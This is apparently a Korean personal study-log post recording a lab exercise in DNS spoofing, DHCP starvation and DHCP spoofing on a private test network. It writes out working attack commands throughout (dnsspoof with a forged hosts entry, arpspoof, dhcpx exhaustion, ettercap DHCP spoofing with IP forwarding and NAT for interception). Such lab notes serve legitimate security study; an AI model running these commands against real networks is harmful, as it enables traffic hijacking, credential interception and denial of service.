정보보안/공부 기록

DNS/DHCP Attack

고고잉 2023. 1. 1. 19:06

DNS Attack

칼리

아파치
service apache2 start

아파치 설정파일
vim /etc/apache2/apache2.conf 

startbootstrap-agency-gh-pages 디렉터리를 /var/www/html로 받고
var/www/html에 있던 기존  index.html파일은 지우고 tartbootstrap-agency-gh-pages 안에 있던 파일들을 /var/www/html로 꺼내놓는다.
그리고 모든 파일을 775로 변경한다
chmod 755 -R ./*  

service apache2 restart 해준다.

원래는 똑같은 홈페이지를 준비해야 하지만 지금은 연습이므로
index.html파일 열어서 해킹 성공했는지 쉽게 알아볼 수 있게 내용을 변경해준다.

dnsspoof이 실행되는지 확인 후 

vim /usr/share/dsniff/dnsspoof.hosts 안에 
10.10.10.40  www.test.com 을 추가한다.

arpspoof -t 10.10.10.10 10.10.10.200  실행
fragrouter -B1 중단 (억지로 성공하기 위해서..)

- /usr/share/dsniff/dnsspoof.hosts파일에 있는 목록과 일치하는 요청이 있으면 응답을 보내라
dnsspoof -i eth0 -f /usr/share/dsniff/dnsspoof.hosts 실행


칼리
dhcpx 로 다운받기
DHCP Attack
- DHCP Starvation Tool
  > 맥주소를 변경하여 계속 할당요청하여 dhcp ip를 고갈시키는 공격
- 윈도우에서 아무것도 할당 받지 않았던 상태에서 해야함
dhcpx -i eth0 -vvv -D 10.10.10.30  

윈도우 ipconfig 설정 지우기
ipconfig /release

dhcp 할당 로그 확인
 tail -f /var/lib/dhcpd/dhcpd.leases



DHCP Spoofing

단방향 공격
- 공격자 GW로 변경되어 할당받음
ettercap -T -M dhcp:10.10.10.240-249/255.255.255.0/10.10.10.30(dns설정)

양방향 공격
- 응답까지 캡쳐할 수 있게 함
- 네트워크 추가하기 eth1
- 추가한 네트워크 eth1 에 192.168.0.254/24로 네트워크 설정 후 재부팅

-Sysctl 활성화 하기
sysctl net.ipv4.ip_forward=1
-natpat로 라우팅하기
iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE

iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE

ettercap -i eth1 -T -M dhcp:192.168.0.10-19/255.255.255.0/8.8.8.8 
> ettercap 실행 후 윈도우에서 ip할당 받고 ettercap 실행 종료 후 윈도우에서 ping 보내지는지 확인